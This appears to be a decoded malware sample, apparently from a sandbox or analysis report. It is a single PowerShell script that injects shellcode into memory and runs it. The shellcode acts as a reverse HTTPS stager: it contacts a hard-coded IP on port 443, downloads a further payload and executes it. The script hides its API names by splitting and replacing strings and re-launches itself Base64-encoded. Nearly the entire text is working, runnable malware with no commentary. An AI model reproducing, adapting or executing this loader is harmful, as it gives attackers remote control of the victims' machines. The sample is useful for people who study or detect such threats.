Decoded

1. $lz='$rz=''[DllImport(("msvcrt.dll"))]public static extern IntPtr gmR(uint dwSize, uint amount);[DllImport("kernel32.dll")]public static extern IntPtr Nlw(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("kernel32.dll")]public static extern IntPtr VirtualProtect(IntPtr lpStartAddress, uint dwSize, uint flNewProtect, out uint YHe);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$rz=$rz.replace("Nlw", "CreateT"+"h"+"read");$rz=$rz.replace("gmR", "calloc");$vL=Add-Type -member $rz -Name "As" -namespace Win32Functions -pass;$YV=";fc,;e8,;82,;00,;00,;00,;60,;89,;e5,;31,;c0,;64,;8b,;50,;30,;8b,;52,;0c,;8b,;52,;14,;8b,;72,;28,;0f,;b7,;4a,;26,;31,;ff,;ac,;3c,;61,;7c,;02,;2c,;20,;c1,;cf,;0d,;01,;c7,;e2,;f2,;52,;57,;8b,;52,;10,;8b,;4a,;3c,;8b,;4c,;11,;78,;e3,;48,;01,;d1,;51,;8b,;59,;20,;01,;d3,;8b,;49,;18,;e3,;3a,;49,;8b,;34,;8b,;01,;d6,;31,;ff,;ac,;c1,;cf,;0d,;01,;c7,;38,;e0,;75,;f6,;03,;7d,;f8,;3b,;7d,;24,;75,;e4,;58,;8b,;58,;24,;01,;d3,;66,;8b,;0c,;4b,;8b,;58,;1c,;01,;d3,;8b,;04,;8b,;01,;d0,;89,;44,;24,;24,;5b,;5b,;61,;59,;5a,;51,;ff,;e0,;5f,;5f,;5a,;8b,;12,;eb,;8d,;5d,;68,;6e,;65,;74,;00,;68,;77,;69,;6e,;69,;54,;68,;4c,;77,;26,;07,;ff,;d5,;31,;db,;53,;53,;53,;53,;53,;68,;3a,;56,;79,;a7,;ff,;d5,;53,;53,;6a,;03,;53,;53,;68,;bb,;01,;00,;00,;e8,;b0,;00,;00,;00,;2f,;32,;39,;6e,;32,;5f,;4a,;4b,;2d,;31,;58,;7a,;61,;35,;74,;76,;6e,;68,;6e,;68,;51,;63,;67,;35,;34,;46,;6d,;30,;57,;43,;00,;50,;68,;57,;89,;9f,;c6,;ff,;d5,;89,;c6,;53,;68,;00,;32,;e0,;84,;53,;53,;53,;57,;53,;56,;68,;eb,;55,;2e,;3b,;ff,;d5,;96,;6a,;0a,;5f,;68,;80,;33,;00,;00,;89,;e0,;6a,;04,;50,;6a,;1f,;56,;68,;75,;46,;9e,;86,;ff,;d5,;53,;53,;53,;53,;56,;68,;2d,;06,;18,;7b,;ff,;d5,;85,;c0,;75,;16,;68,;88,;13,;00,;00,;68,;44,;f0,;35,;e0,;ff,;d5,;4f,;75,;cd,;68,;f0,;b5,;a2,;56,;ff,;d5,;6a,;40,;68,;00,;10,;00,;00,;68,;00,;00,;40,;00,;53,;68,;58,;a4,;53,;e5,;ff,;d5,;93,;53,;53,;89,;e7,;57,;68,;00,;20,;00,;00,;53,;56,;68,;12,;96,;89,;e2,;ff,;d5,;85,;c0,;74,;cd,;8b,;07,;01,;c3,;85,;c0,;75,;e5,;58,;c3,;5f,;e8,;69,;ff,;ff,;ff,;38,;36,;2e,;31,;30,;36,;2e,;31,;30,;32,;2e,;31,;32,;37,;00";[byte[]]$YV = $YV.replace(";","0x").Split(",");$es=0x1001;if ($YV.L -gt 0x1001){$es=$YV.L};$ap=$vL::calloc(0x1001, 1);[UInt64]$YHe = 0;for($hS=0;$hS -le($YV.Length-1);$hS++){$vL::memset([IntPtr]($ap.ToInt32()+$hS), $YV[$hS], 1)};$vL::VirtualProtect($ap, 0x1001, 0x40, [Ref]$YHe);$vL::CreateThread(0,0x00,$ap,0,0,0);';$Wm=[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($lz));$qY="powershell";$AT="Windows";if([IntPtr]::Size -eq 8){$qY="C:\$AT\syswow64\$AT$qY\v1.0\$qY"};iex " $qY -e $Wm -noe"